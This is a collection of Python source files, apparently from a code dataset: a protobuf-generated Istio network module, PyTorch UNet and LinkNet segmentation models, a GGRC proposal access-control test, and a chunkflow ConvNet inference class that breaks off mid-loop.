'DESCRIPTOR' : _NETWORK_ISTIONETWORKGATEWAY,
'__module__' : 'mesh.v1alpha1.network_pb2'
# @@protoc_insertion_point(class_scope:istio.mesh.v1alpha1.Network.IstioNetworkGateway)
})
,
'DESCRIPTOR' : _NETWORK,
'__module__' : 'mesh.v1alpha1.network_pb2'
# @@protoc_insertion_point(class_scope:istio.mesh.v1alpha1.Network)
})
_sym_db.RegisterMessage(Network)
_sym_db.RegisterMessage(Network.NetworkEndpoints)
_sym_db.RegisterMessage(Network.IstioNetworkGateway)
MeshNetworks = _reflection.GeneratedProtocolMessageType('MeshNetworks', (_message.Message,), {
'NetworksEntry' : _reflection.GeneratedProtocolMessageType('NetworksEntry', (_message.Message,), {
'DESCRIPTOR' : _MESHNETWORKS_NETWORKSENTRY,
'__module__' : 'mesh.v1alpha1.network_pb2'
# @@protoc_insertion_point(class_scope:istio.mesh.v1alpha1.MeshNetworks.NetworksEntry)
})
,
'DESCRIPTOR' : _MESHNETWORKS,
'__module__' : 'mesh.v1alpha1.network_pb2'
# @@protoc_insertion_point(class_scope:istio.mesh.v1alpha1.MeshNetworks)
})
_sym_db.RegisterMessage(MeshNetworks)
_sym_db.RegisterMessage(MeshNetworks.NetworksEntry)
DESCRIPTOR._options = None
_NETWORK_ISTIONETWORKGATEWAY.fields_by_name['port']._options = None
_NETWORK.fields_by_name['endpoints']._options = None
_NETWORK.fields_by_name['gateways']._options = None
_MESHNETWORKS_NETWORKSENTRY._options = None
_MESHNETWORKS.fields_by_name['networks']._options = None
# @@protoc_insertion_point(module_scope)
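# ---------------------------------------------------------------------------
# Illustrative usage sketch (appended for clarity; not part of the generated
# protobuf output). It builds and serializes a MeshNetworks message using the
# message classes defined above; the network name and the concrete endpoint
# and gateway values are hypothetical.
if __name__ == '__main__':
    mesh_networks = MeshNetworks()
    # message-valued map entries are created on first access
    network = mesh_networks.networks['hypothetical-network']
    endpoint = network.endpoints.add()
    endpoint.from_registry = 'Kubernetes'   # sets the 'ne' oneof
    gateway = network.gateways.add()
    gateway.address = '10.0.0.1'            # sets the 'gw' oneof
    gateway.port = 443
    serialized = mesh_networks.SerializeToString()
    parsed = MeshNetworks()
    parsed.ParseFromString(serialized)
    assert parsed.networks['hypothetical-network'].gateways[0].port == 443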
|
py | 7dfaf3bbf931a329199701691a0f6f1c8dfa5810 | from torch import nn
import torch
from torchvision import models
import torchvision
from torch.nn import functional as F
def conv3x3(in_, out):
return nn.Conv2d(in_, out, 3, padding=1)
class ConvRelu(nn.Module):
def __init__(self, in_: int, out: int):
super().__init__()
self.conv = conv3x3(in_, out)
self.activation = nn.ReLU(inplace=True)
def forward(self, x):
x = self.conv(x)
x = self.activation(x)
return x
class DecoderBlock(nn.Module):
"""
    Parameters for the deconvolution were chosen to avoid checkerboard artifacts, following
    https://distill.pub/2016/deconv-checkerboard/
"""
def __init__(self, in_channels, middle_channels, out_channels, is_deconv=True):
super(DecoderBlock, self).__init__()
self.in_channels = in_channels
if is_deconv:
self.block = nn.Sequential(
ConvRelu(in_channels, middle_channels),
nn.ConvTranspose2d(middle_channels, out_channels, kernel_size=4, stride=2,
padding=1),
nn.ReLU(inplace=True)
)
else:
self.block = nn.Sequential(
nn.Upsample(scale_factor=2, mode='bilinear', align_corners=False),
ConvRelu(in_channels, middle_channels),
ConvRelu(middle_channels, out_channels),
)
def forward(self, x):
return self.block(x)
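# Illustrative sketch (hypothetical sizes, appended for clarity): both
# DecoderBlock branches double the spatial resolution, the deconvolution
# branch via ConvTranspose2d(kernel_size=4, stride=2, padding=1) and the
# bilinear branch via nn.Upsample(scale_factor=2), so either can be used
# without changing the decoder's output shapes.
def _decoder_block_shape_check():
    x = torch.randn(1, 256, 16, 16)
    for is_deconv in (True, False):
        block = DecoderBlock(256, 128, 64, is_deconv=is_deconv)
        assert block(x).shape == (1, 64, 32, 32)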
class UNet11(nn.Module):
def __init__(self, num_classes=1, num_filters=32, pretrained=True):
"""
:param num_classes:
:param num_filters:
:param pretrained:
False - no pre-trained network used
True - encoder pre-trained with VGG11
"""
super().__init__()
self.pool = nn.MaxPool2d(2, 2)
self.num_classes = num_classes
self.encoder = models.vgg11(pretrained=pretrained).features
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Sequential(self.encoder[0],
self.relu)
self.conv2 = nn.Sequential(self.encoder[3],
self.relu)
self.conv3 = nn.Sequential(
self.encoder[6],
self.relu,
self.encoder[8],
self.relu,
)
self.conv4 = nn.Sequential(
self.encoder[11],
self.relu,
self.encoder[13],
self.relu,
)
self.conv5 = nn.Sequential(
self.encoder[16],
self.relu,
self.encoder[18],
self.relu,
)
self.center = DecoderBlock(256 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv=True)
self.dec5 = DecoderBlock(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv=True)
self.dec4 = DecoderBlock(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 4, is_deconv=True)
self.dec3 = DecoderBlock(256 + num_filters * 4, num_filters * 4 * 2, num_filters * 2, is_deconv=True)
self.dec2 = DecoderBlock(128 + num_filters * 2, num_filters * 2 * 2, num_filters, is_deconv=True)
self.dec1 = ConvRelu(64 + num_filters, num_filters)
self.final = nn.Conv2d(num_filters, num_classes, kernel_size=1)
def forward(self, x):
conv1 = self.conv1(x)
conv2 = self.conv2(self.pool(conv1))
conv3 = self.conv3(self.pool(conv2))
conv4 = self.conv4(self.pool(conv3))
conv5 = self.conv5(self.pool(conv4))
center = self.center(self.pool(conv5))
dec5 = self.dec5(torch.cat([center, conv5], 1))
dec4 = self.dec4(torch.cat([dec5, conv4], 1))
dec3 = self.dec3(torch.cat([dec4, conv3], 1))
dec2 = self.dec2(torch.cat([dec3, conv2], 1))
dec1 = self.dec1(torch.cat([dec2, conv1], 1))
if self.num_classes > 1:
x_out = F.log_softmax(self.final(dec1), dim=1)
else:
x_out = self.final(dec1)
return x_out
class UNet16(nn.Module):
def __init__(self, num_classes=1, num_filters=32, pretrained=True):
"""
:param num_classes:
:param num_filters:
:param pretrained:
False - no pre-trained network used
            True - encoder pre-trained with VGG16
"""
super().__init__()
self.num_classes = num_classes
self.pool = nn.MaxPool2d(2, 2)
self.encoder = torchvision.models.vgg16(pretrained=pretrained).features
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Sequential(self.encoder[0],
self.relu,
self.encoder[2],
self.relu)
self.conv2 = nn.Sequential(self.encoder[5],
self.relu,
self.encoder[7],
self.relu)
self.conv3 = nn.Sequential(self.encoder[10],
self.relu,
self.encoder[12],
self.relu,
self.encoder[14],
self.relu)
self.conv4 = nn.Sequential(self.encoder[17],
self.relu,
self.encoder[19],
self.relu,
self.encoder[21],
self.relu)
self.conv5 = nn.Sequential(self.encoder[24],
self.relu,
self.encoder[26],
self.relu,
self.encoder[28],
self.relu)
self.center = DecoderBlock(512, num_filters * 8 * 2, num_filters * 8)
self.dec5 = DecoderBlock(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 8)
self.dec4 = DecoderBlock(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 8)
self.dec3 = DecoderBlock(256 + num_filters * 8, num_filters * 4 * 2, num_filters * 2)
self.dec2 = DecoderBlock(128 + num_filters * 2, num_filters * 2 * 2, num_filters)
self.dec1 = ConvRelu(64 + num_filters, num_filters)
self.final = nn.Conv2d(num_filters, num_classes, kernel_size=1)
def forward(self, x):
conv1 = self.conv1(x)
conv2 = self.conv2(self.pool(conv1))
conv3 = self.conv3(self.pool(conv2))
conv4 = self.conv4(self.pool(conv3))
conv5 = self.conv5(self.pool(conv4))
center = self.center(self.pool(conv5))
dec5 = self.dec5(torch.cat([center, conv5], 1))
dec4 = self.dec4(torch.cat([dec5, conv4], 1))
dec3 = self.dec3(torch.cat([dec4, conv3], 1))
dec2 = self.dec2(torch.cat([dec3, conv2], 1))
dec1 = self.dec1(torch.cat([dec2, conv1], 1))
if self.num_classes > 1:
x_out = F.log_softmax(self.final(dec1), dim=1)
else:
x_out = self.final(dec1)
return x_out
class DecoderBlockLinkNet(nn.Module):
def __init__(self, in_channels, n_filters):
super().__init__()
self.relu = nn.ReLU(inplace=True)
# B, C, H, W -> B, C/4, H, W
self.conv1 = nn.Conv2d(in_channels, in_channels // 4, 1)
self.norm1 = nn.BatchNorm2d(in_channels // 4)
# B, C/4, H, W -> B, C/4, 2 * H, 2 * W
self.deconv2 = nn.ConvTranspose2d(in_channels // 4, in_channels // 4, kernel_size=4,
stride=2, padding=1, output_padding=0)
self.norm2 = nn.BatchNorm2d(in_channels // 4)
# B, C/4, H, W -> B, C, H, W
self.conv3 = nn.Conv2d(in_channels // 4, n_filters, 1)
self.norm3 = nn.BatchNorm2d(n_filters)
def forward(self, x):
x = self.conv1(x)
x = self.norm1(x)
x = self.relu(x)
x = self.deconv2(x)
x = self.norm2(x)
x = self.relu(x)
x = self.conv3(x)
x = self.norm3(x)
x = self.relu(x)
return x
class LinkNet34(nn.Module):
def __init__(self, num_classes=1, num_channels=1, pretrained=True):
super().__init__()
# assert num_channels == 3 # why?
self.num_classes = num_classes
filters = [64, 128, 256, 512]
resnet = models.resnet34(pretrained=pretrained)
self.firstconv = resnet.conv1
self.firstbn = resnet.bn1
self.firstrelu = resnet.relu
self.firstmaxpool = resnet.maxpool
self.encoder1 = resnet.layer1
self.encoder2 = resnet.layer2
self.encoder3 = resnet.layer3
self.encoder4 = resnet.layer4
# Decoder
self.decoder4 = DecoderBlockLinkNet(filters[3], filters[2])
self.decoder3 = DecoderBlockLinkNet(filters[2], filters[1])
self.decoder2 = DecoderBlockLinkNet(filters[1], filters[0])
self.decoder1 = DecoderBlockLinkNet(filters[0], filters[0])
# Final Classifier
self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
self.finalrelu1 = nn.ReLU(inplace=True)
self.finalconv2 = nn.Conv2d(32, 32, 3)
self.finalrelu2 = nn.ReLU(inplace=True)
self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
# noinspection PyCallingNonCallable
def forward(self, x):
# Encoder
x = self.firstconv(x)
x = self.firstbn(x)
x = self.firstrelu(x)
x = self.firstmaxpool(x)
e1 = self.encoder1(x)
e2 = self.encoder2(e1)
e3 = self.encoder3(e2)
e4 = self.encoder4(e3)
# Decoder with Skip Connections
d4 = self.decoder4(e4) + e3
d3 = self.decoder3(d4) + e2
d2 = self.decoder2(d3) + e1
d1 = self.decoder1(d2)
# Final Classification
f1 = self.finaldeconv1(d1)
f2 = self.finalrelu1(f1)
f3 = self.finalconv2(f2)
f4 = self.finalrelu2(f3)
f5 = self.finalconv3(f4)
if self.num_classes > 1:
x_out = F.log_softmax(f5, dim=1)
else:
x_out = f5
return x_out
class Conv3BN(nn.Module):
def __init__(self, in_: int, out: int, bn=False):
super().__init__()
self.conv = conv3x3(in_, out)
self.bn = nn.BatchNorm2d(out) if bn else None
self.activation = nn.ReLU(inplace=True)
def forward(self, x):
x = self.conv(x)
if self.bn is not None:
x = self.bn(x)
x = self.activation(x)
return x
class UNetModule(nn.Module):
def __init__(self, in_: int, out: int):
super().__init__()
self.l1 = Conv3BN(in_, out)
self.l2 = Conv3BN(out, out)
def forward(self, x):
x = self.l1(x)
x = self.l2(x)
return x
class UNet(nn.Module):
"""
Vanilla UNet.
Implementation from https://github.com/lopuhin/mapillary-vistas-2017/blob/master/unet_models.py
"""
output_downscaled = 1
module = UNetModule
def __init__(self,
input_channels: int = 3,
filters_base: int = 32,
down_filter_factors=(1, 2, 4, 8, 16),
up_filter_factors=(1, 2, 4, 8, 16),
bottom_s=4,
num_classes=1,
add_output=True):
super().__init__()
self.num_classes = num_classes
assert len(down_filter_factors) == len(up_filter_factors)
assert down_filter_factors[-1] == up_filter_factors[-1]
down_filter_sizes = [filters_base * s for s in down_filter_factors]
up_filter_sizes = [filters_base * s for s in up_filter_factors]
self.down, self.up = nn.ModuleList(), nn.ModuleList()
self.down.append(self.module(input_channels, down_filter_sizes[0]))
for prev_i, nf in enumerate(down_filter_sizes[1:]):
self.down.append(self.module(down_filter_sizes[prev_i], nf))
for prev_i, nf in enumerate(up_filter_sizes[1:]):
self.up.append(self.module(
down_filter_sizes[prev_i] + nf, up_filter_sizes[prev_i]))
pool = nn.MaxPool2d(2, 2)
pool_bottom = nn.MaxPool2d(bottom_s, bottom_s)
upsample = nn.Upsample(scale_factor=2)
upsample_bottom = nn.Upsample(scale_factor=bottom_s)
self.downsamplers = [None] + [pool] * (len(self.down) - 1)
self.downsamplers[-1] = pool_bottom
self.upsamplers = [upsample] * len(self.up)
self.upsamplers[-1] = upsample_bottom
self.add_output = add_output
if add_output:
self.conv_final = nn.Conv2d(up_filter_sizes[0], num_classes, 1)
def forward(self, x):
xs = []
for downsample, down in zip(self.downsamplers, self.down):
x_in = x if downsample is None else downsample(xs[-1])
x_out = down(x_in)
xs.append(x_out)
x_out = xs[-1]
for x_skip, upsample, up in reversed(
list(zip(xs[:-1], self.upsamplers, self.up))):
x_out = upsample(x_out)
x_out = up(torch.cat([x_out, x_skip], 1))
if self.add_output:
x_out = self.conv_final(x_out)
if self.num_classes > 1:
x_out = F.log_softmax(x_out, dim=1)
return x_out
class AlbuNet(nn.Module):
"""
UNet (https://arxiv.org/abs/1505.04597) with Resnet34(https://arxiv.org/abs/1512.03385) encoder
Proposed by Alexander Buslaev: https://www.linkedin.com/in/al-buslaev/
"""
def __init__(self, num_classes=1, num_filters=32, pretrained=True, is_deconv=False):
"""
:param num_classes:
:param num_filters:
:param pretrained:
False - no pre-trained network is used
True - encoder is pre-trained with resnet34
        :param is_deconv:
False: bilinear interpolation is used in decoder
True: deconvolution is used in decoder
"""
super().__init__()
self.num_classes = num_classes
self.pool = nn.MaxPool2d(2, 2)
self.encoder = torchvision.models.resnet34(pretrained=pretrained)
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Sequential(self.encoder.conv1,
self.encoder.bn1,
self.encoder.relu,
self.pool)
self.conv2 = self.encoder.layer1
self.conv3 = self.encoder.layer2
self.conv4 = self.encoder.layer3
self.conv5 = self.encoder.layer4
self.center = DecoderBlock(512, num_filters * 8 * 2, num_filters * 8, is_deconv)
self.dec5 = DecoderBlock(512 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv)
self.dec4 = DecoderBlock(256 + num_filters * 8, num_filters * 8 * 2, num_filters * 8, is_deconv)
self.dec3 = DecoderBlock(128 + num_filters * 8, num_filters * 4 * 2, num_filters * 2, is_deconv)
self.dec2 = DecoderBlock(64 + num_filters * 2, num_filters * 2 * 2, num_filters * 2 * 2, is_deconv)
self.dec1 = DecoderBlock(num_filters * 2 * 2, num_filters * 2 * 2, num_filters, is_deconv)
self.dec0 = ConvRelu(num_filters, num_filters)
self.final = nn.Conv2d(num_filters, num_classes, kernel_size=1)
def forward(self, x):
conv1 = self.conv1(x)
conv2 = self.conv2(conv1)
conv3 = self.conv3(conv2)
conv4 = self.conv4(conv3)
conv5 = self.conv5(conv4)
center = self.center(self.pool(conv5))
dec5 = self.dec5(torch.cat([center, conv5], 1))
dec4 = self.dec4(torch.cat([dec5, conv4], 1))
dec3 = self.dec3(torch.cat([dec4, conv3], 1))
dec2 = self.dec2(torch.cat([dec3, conv2], 1))
dec1 = self.dec1(dec2)
dec0 = self.dec0(dec1)
if self.num_classes > 1:
x_out = F.log_softmax(self.final(dec0), dim=1)
else:
x_out = self.final(dec0)
return x_out
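# ---------------------------------------------------------------------------
# Illustrative usage sketch (hypothetical settings, appended for clarity):
# instantiate one of the models above and run a dummy forward pass.
# pretrained=False avoids downloading ImageNet weights; the spatial size
# should be divisible by 64 so every pooling/upsampling stage aligns.
if __name__ == '__main__':
    model = AlbuNet(num_classes=1, num_filters=32, pretrained=False)
    model.eval()
    dummy = torch.randn(1, 3, 256, 256)
    with torch.no_grad():
        mask_logits = model(dummy)
    print(mask_logits.shape)  # expected: torch.Size([1, 1, 256, 256])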
|
py | 7dfaf4a1c5290ee4db43a22bb83dc493feb31232 | # Copyright (C) 2019 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Test for proposal in case of usage of custom creator role"""
import json
from ggrc.models import all_models
from integration.ggrc import TestCase
from integration.ggrc.access_control import acl_helper
from integration.ggrc.api_helper import Api
from integration.ggrc.models import factories
from integration.ggrc.proposal import _get_query_proposal_request
from integration.ggrc_basic_permissions.models \
import factories as rbac_factories
from integration.ggrc.query_helper import WithQueryApi
class TestOwnerAccess(TestCase, WithQueryApi):
"""Ensure that global creator has access to created proposal by him"""
def setUp(self):
super(TestOwnerAccess, self).setUp()
self.client.get("/login")
self.api = Api()
@staticmethod
def _get_create_proposal_request(program_id, acr_id, person_id):
"""Prepare dict with proposal creation request"""
return {
"proposal": {
"instance": {
"id": program_id,
"type": all_models.Program.__name__,
},
"full_instance_content": {"title": "new_title"},
"agenda": "update cav",
"context": None,
"access_control_list": [acl_helper.get_acl_json(acr_id, person_id)]
}
}
def test_admin_has_access(self):
"""Ensure that global creator has access to created proposal by him"""
role_creator = all_models.Role.query.filter(
all_models.Role.name == "Creator").one()
# prepare - create program, assign roles
factories.AccessControlRoleFactory(name="ACL_Reader", update=0,
object_type="Program")
with factories.single_commit():
program = factories.ProgramFactory()
person = factories.PersonFactory()
rbac_factories.UserRoleFactory(role=role_creator, person=person)
factories.AccessControlPersonFactory(
ac_list=program.acr_name_acl_map["ACL_Reader"],
person=person,
)
program_id = program.id
# make query to create proposal
self.api.set_user(person)
self.client.get("/login")
acr_class = all_models.AccessControlRole
acr = acr_class.query.filter(acr_class.name == 'ProposalEditor',
acr_class.object_type == 'Proposal').one()
create_data = self._get_create_proposal_request(
program_id, acr.id, person.id)
self.api.post(all_models.Proposal, create_data)
query_data = _get_query_proposal_request(program_id)
headers = {"Content-Type": "application/json", }
resp = self.api.client.post("/query",
data=json.dumps(query_data),
headers=headers).json
self.assertEqual(1, len(resp))
self.assertEqual(resp[0]["Proposal"]["count"], 1)
def test_nonadmin_has_no_access(self):
"""Test access to proposal for non creator of proposal"""
role_creator = all_models.Role.query.filter(
all_models.Role.name == "Creator").one()
# prepare - create program, assign roles
factories.AccessControlRoleFactory(name="ACL_Reader", update=0,
object_type="Program")
with factories.single_commit():
program = factories.ProgramFactory()
person1 = factories.PersonFactory()
person2 = factories.PersonFactory()
for person in (person1, person2):
rbac_factories.UserRoleFactory(role=role_creator, person=person)
factories.AccessControlPersonFactory(
ac_list=program.acr_name_acl_map["ACL_Reader"],
person=person,
)
program_id = program.id
person2_id = person2.id
# make query to create proposal by person1
self.api.set_user(person1)
self.client.get("/login")
acr_class = all_models.AccessControlRole
acr = acr_class.query.filter(acr_class.name == 'ProposalEditor',
acr_class.object_type == 'Proposal').one()
create_data = self._get_create_proposal_request(
program_id, acr.id, person1.id)
self.api.post(all_models.Proposal, create_data)
# login as person2 and make request
self.api.set_user(all_models.Person.query.get(person2_id))
self.client.get("/login")
query_data = _get_query_proposal_request(program_id)
headers = {"Content-Type": "application/json", }
resp = self.api.client.post("/query",
data=json.dumps(query_data),
headers=headers).json
self.assertEqual(1, len(resp))
self.assertEqual(resp[0]["Proposal"]["count"], 0)
|
py | 7dfaf7e1979e72e2cb64ec98e854470dd8721365 | #!/usr/bin/env python
__doc__ = """
ConvNet Inference of an image chunk
"""
import os
import logging
import time
import numpy as np
from tqdm import tqdm
from warnings import warn
from typing import Union
from .patch.base import PatchInferencerBase
from tempfile import mktemp
from chunkflow.chunk import Chunk
# from chunkflow.chunk.affinity_map import AffinityMap
class Inferencer(object):
"""
Inferencer
convnet inference for a whole chunk.
    If the patches align with the input chunk size, we do not need a chunk mask.
    If the patches do not align, we create a chunk mask to make sure that
    the output has the same size as the input.
    The output buffer is smaller than the input chunk size, and the cropped
    margin area is not allocated. This saves about 20% of memory usage.
    What's more, the output buffer can be formatted as a memory map backed
    by disk. This is particularly useful for multi-channel output with a
    large chunk size.
"""
def __init__(self,
convnet_model: Union[str, PatchInferencerBase],
convnet_weight_path: str,
input_patch_size: Union[tuple, list],
output_patch_size: Union[tuple, list] = None,
patch_num: Union[tuple, list] = None,
num_output_channels: int = 3,
output_patch_overlap: Union[tuple, list] = (4, 64, 64),
output_crop_margin: Union[tuple, list] = None,
dtype = 'float32',
framework: str = 'identity',
batch_size: int = 1,
bump: str = 'wu',
input_size: tuple = None,
mask_output_chunk: bool = False,
mask_myelin_threshold = None,
dry_run: bool = False):
assert input_size is None or patch_num is None
if output_patch_size is None:
output_patch_size = input_patch_size
if logging.getLogger().getEffectiveLevel() <= 30:
self.verbose = True
else:
self.verbose = False
self.input_patch_size = input_patch_size
self.output_patch_size = output_patch_size
self.output_patch_overlap = output_patch_overlap
self.patch_num = patch_num
self.batch_size = batch_size
self.input_size = input_size
if output_crop_margin is None:
if mask_output_chunk:
self.output_crop_margin = (0,0,0)
else:
self.output_crop_margin = self.output_patch_overlap
else:
self.output_crop_margin = output_crop_margin
# we should always crop more than the patch overlap
# since the overlap region is reweighted by patch mask
# To-Do: equal should also be OK
assert np.alltrue([v<=m for v, m in zip(
self.output_patch_overlap,
self.output_crop_margin)])
self.output_patch_crop_margin = tuple((ips-ops)//2 for ips, ops in zip(
input_patch_size, output_patch_size))
self.output_offset = tuple(opcm+ocm for opcm, ocm in zip(
self.output_patch_crop_margin, self.output_crop_margin))
self.output_patch_stride = tuple(s - o for s, o in zip(
output_patch_size, output_patch_overlap))
self.input_patch_overlap = tuple(opcm*2+oo for opcm, oo in zip(
self.output_patch_crop_margin, self.output_patch_overlap))
self.input_patch_stride = tuple(ps - po for ps, po in zip(
input_patch_size, self.input_patch_overlap))
# no chunk wise mask, the patches should be aligned inside chunk
if not mask_output_chunk:
assert (self.input_size is not None) or (self.patch_num is not None)
if patch_num is None:
assert input_size is not None
self.patch_num = tuple((isz - o)//s for isz, o, s in zip(
self.input_size, self.input_patch_overlap, self.input_patch_stride))
if self.input_size is None:
assert self.patch_num is not None
self.input_size = tuple(pst*pn + po for pst, pn, po in zip(
self.input_patch_stride, self.patch_num, self.input_patch_overlap))
self.output_size = tuple(pst*pn + po - 2*ocm for pst, pn, po, ocm in zip(
self.output_patch_stride, self.patch_num,
self.output_patch_overlap, self.output_crop_margin))
else:
# we can handle arbitrary input and output size
self.input_size = None
self.output_size = None
self.num_output_channels = num_output_channels
self.mask_output_chunk = mask_output_chunk
self.output_chunk_mask = None
self.dtype = dtype
self.mask_myelin_threshold = mask_myelin_threshold
self.dry_run = dry_run
# allocate a buffer to avoid redundant memory allocation
self.input_patch_buffer = np.zeros((batch_size, 1, *input_patch_size),
dtype=dtype)
self.patch_slices_list = []
if isinstance(convnet_model, str):
convnet_model = os.path.expanduser(convnet_model)
if isinstance(convnet_weight_path, str):
convnet_weight_path = os.path.expanduser(convnet_weight_path)
self._prepare_patch_inferencer(framework, convnet_model, convnet_weight_path, bump)
@property
def compute_device(self):
return self.patch_inferencer.compute_device
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
pass
def _update_parameters_for_input_chunk(self, input_chunk):
"""
        if the input size is consistent with the old one, reuse the
        patch offset list and output chunk mask. Otherwise, recompute them.
"""
if np.array_equal(self.input_size, input_chunk.shape):
print('reusing output chunk mask.')
assert self.patch_slices_list is not None
else:
if self.input_size is not None:
                warn('the input size has changed, using the new input size.')
self.input_size = input_chunk.shape
if not self.mask_output_chunk:
self._check_alignment()
self.output_size = tuple(
isz-2*ocso for isz, ocso in
zip(self.input_size, self.output_offset))
self.output_patch_stride = tuple(s-o for s, o in zip(
self.output_patch_size, self.output_patch_overlap))
self._construct_patch_slices_list(input_chunk.voxel_offset)
self._construct_output_chunk_mask(input_chunk)
def _prepare_patch_inferencer(self, framework, convnet_model, convnet_weight_path, bump):
# allow to pass patch_inferencer directly, if so assign and return
if framework == 'prebuilt':
self.patch_inferencer = convnet_model
return
# prepare for inference
if framework == 'pznet':
from .patch.pznet import PZNet as PatchInferencer
elif framework == 'pytorch':
            # pytorch will not output consistent results if we use batch size > 1
# https://discuss.pytorch.org/t/solved-inconsistent-results-during-test-using-different-batch-size/2265
assert self.batch_size == 1
from .patch.pytorch import PyTorch as PatchInferencer
# currently, we do not support pytorch backend with different
# input and output patch size and overlap.
elif framework == 'pytorch-multitask':
# currently only this type of task support mask in device
from .patch.pytorch_multitask import PyTorchMultitask as PatchInferencer
elif framework == 'identity':
from .patch.identity import Identity as PatchInferencer
elif framework == 'universal':
from .patch.universal import Universal as PatchInferencer
else:
            raise Exception(f'invalid inference backend: {framework}')
self.patch_inferencer = PatchInferencer(
convnet_model,
convnet_weight_path,
input_patch_size=self.input_patch_size,
output_patch_size=self.output_patch_size,
output_patch_overlap=self.output_patch_overlap,
num_output_channels=self.num_output_channels,
dtype=self.dtype,
bump=bump)
def _check_alignment(self):
is_align = tuple((i - o) % s == 0 for i, s, o in zip(
self.input_size,
self.patch_inferencer.input_patch_stride,
self.patch_inferencer.input_patch_overlap))
        # all axes should be aligned
        # the patches should be aligned with the input size when
        # we do not mask the output chunk
assert np.all(is_align)
logging.info('great! patches aligns in chunk.')
def _construct_patch_slices_list(self, input_chunk_offset):
"""
create the normalization mask and patch bounding box list
"""
self.patch_slices_list = []
# the step is the stride, so the end of aligned patch is
# input_size - patch_overlap
input_patch_size = self.input_patch_size
output_patch_size = self.output_patch_size
input_patch_overlap = self.input_patch_overlap
input_patch_stride = self.input_patch_stride
print('Construct patch slices list...')
for iz in range(0, self.input_size[0] - input_patch_overlap[0], input_patch_stride[0]):
if iz + input_patch_size[0] > self.input_size[0]:
iz = self.input_size[0] - input_patch_size[0]
assert iz >= 0
iz += input_chunk_offset[-3]
oz = iz + self.output_patch_crop_margin[0]
for iy in range(0, self.input_size[1] - input_patch_overlap[1], input_patch_stride[1]):
if iy + input_patch_size[1] > self.input_size[1]:
iy = self.input_size[1] - input_patch_size[1]
assert iy >= 0
iy += input_chunk_offset[-2]
oy = iy + self.output_patch_crop_margin[1]
for ix in range(0, self.input_size[2] - input_patch_overlap[2], input_patch_stride[2]):
if ix + input_patch_size[2] > self.input_size[2]:
ix = self.input_size[2] - input_patch_size[2]
assert ix >= 0
ix += input_chunk_offset[-1]
ox = ix + self.output_patch_crop_margin[2]
input_patch_slice = (slice(iz, iz + input_patch_size[0]),
slice(iy, iy + input_patch_size[1]),
slice(ix, ix + input_patch_size[2]))
output_patch_slice = (slice(oz, oz + output_patch_size[0]),
slice(oy, oy + output_patch_size[1]),
slice(ox, ox + output_patch_size[2]))
self.patch_slices_list.append((input_patch_slice, output_patch_slice))
def _construct_output_chunk_mask(self, input_chunk):
if not self.mask_output_chunk:
return
logging.info('creating output chunk mask...')
if self.output_chunk_mask is None or not np.array_equal(
input_chunk.shape, self.output_chunk_mask.shape):
            # To-Do: clean up extra temporary files if we created
# multiple mmap files
#output_mask_mmap_file = mktemp(suffix='.dat')
## the memory map is initialized with 0 in default
#output_mask_array = np.memmap(output_mask_mmap_file,
# dtype=self.dtype, mode='w+',
# shape=self.output_size)
output_mask_array = np.zeros(self.output_size, self.dtype)
else:
output_mask_array = self.output_chunk_mask.array
output_mask_array.fill(0)
output_voxel_offset = tuple(io + ocso for io, ocso in zip(
input_chunk.voxel_offset, self.output_offset))
self.output_chunk_mask = Chunk(
output_mask_array,
voxel_offset=output_voxel_offset,
voxel_size=input_chunk.voxel_size
)
assert len(self.patch_slices_list) > 0
for _, output_patch_slice in self.patch_slices_list:
# accumulate weights using the patch mask in RAM
patch_voxel_offset = tuple(s.start for s in output_patch_slice)
patch_mask = Chunk(self.patch_inferencer.output_patch_mask_numpy,
voxel_offset=patch_voxel_offset)
self.output_chunk_mask.blend(patch_mask)
        # normalize the weights, so that the accumulated inference result
        # multiplied by this mask sums to 1
self.output_chunk_mask.array = 1.0 / self.output_chunk_mask.array
def _get_output_buffer(self, input_chunk):
output_buffer_size = (self.patch_inferencer.num_output_channels, ) + self.output_size
#if self.mask_myelin_threshold is None:
        # a random temporary file. will be removed later.
#output_buffer_mmap_file = mktemp(suffix='.dat')
## the memory map is initialized with 0 in default
#output_buffer_array = np.memmap(output_buffer_mmap_file,
# dtype=self.dtype, mode='w+',
# shape=output_buffer_size)
##else:
# # when we use myelin mask, the masking computation will create a full array in RAM!
# # and it will duplicate the array! thus, we should use normal array in this case.
output_buffer_array = np.zeros(output_buffer_size, dtype=self.dtype)
output_voxel_offset = tuple(io + ocso for io, ocso in zip(
input_chunk.voxel_offset, self.output_offset))
output_buffer = Chunk(
output_buffer_array,
voxel_offset=output_voxel_offset,
voxel_size=input_chunk.voxel_size
)
return output_buffer
def __call__(self, input_chunk: Chunk):
"""
args:
input_chunk (Chunk): input chunk with voxel offset and voxel size
"""
assert isinstance(input_chunk, Chunk)
self._update_parameters_for_input_chunk(input_chunk)
output_buffer = self._get_output_buffer(input_chunk)
if not self.mask_output_chunk:
self._check_alignment()
if self.dry_run:
            print('dry run, return a special artificial chunk.')
size=output_buffer.shape
if self.mask_myelin_threshold:
                # eliminate the myelin channel
size = (size[0]-1, *size[1:])
return Chunk.create(
size=size,
dtype = output_buffer.dtype,
voxel_offset=output_buffer.voxel_offset,
voxel_size=input_chunk.voxel_size,
)
if input_chunk == 0:
print('input is all zero, return zero buffer directly')
if self.mask_myelin_threshold:
assert output_buffer.shape[0] == 4
return output_buffer[:-1, ...]
else:
return output_buffer
if np.issubdtype(input_chunk.dtype, np.integer):
# normalize to 0-1 value range
dtype_max = np.iinfo(input_chunk.dtype).max
input_chunk = input_chunk.astype(self.dtype)
input_chunk /= dtype_max
chunk_time_start = time.time()
# iterate the offset list
for i in tqdm(range(0, len(self.patch_slices_list), self.batch_size),
disable=(self.verbose <= 0),
desc='ConvNet inference for patches: '):
start = time.time()
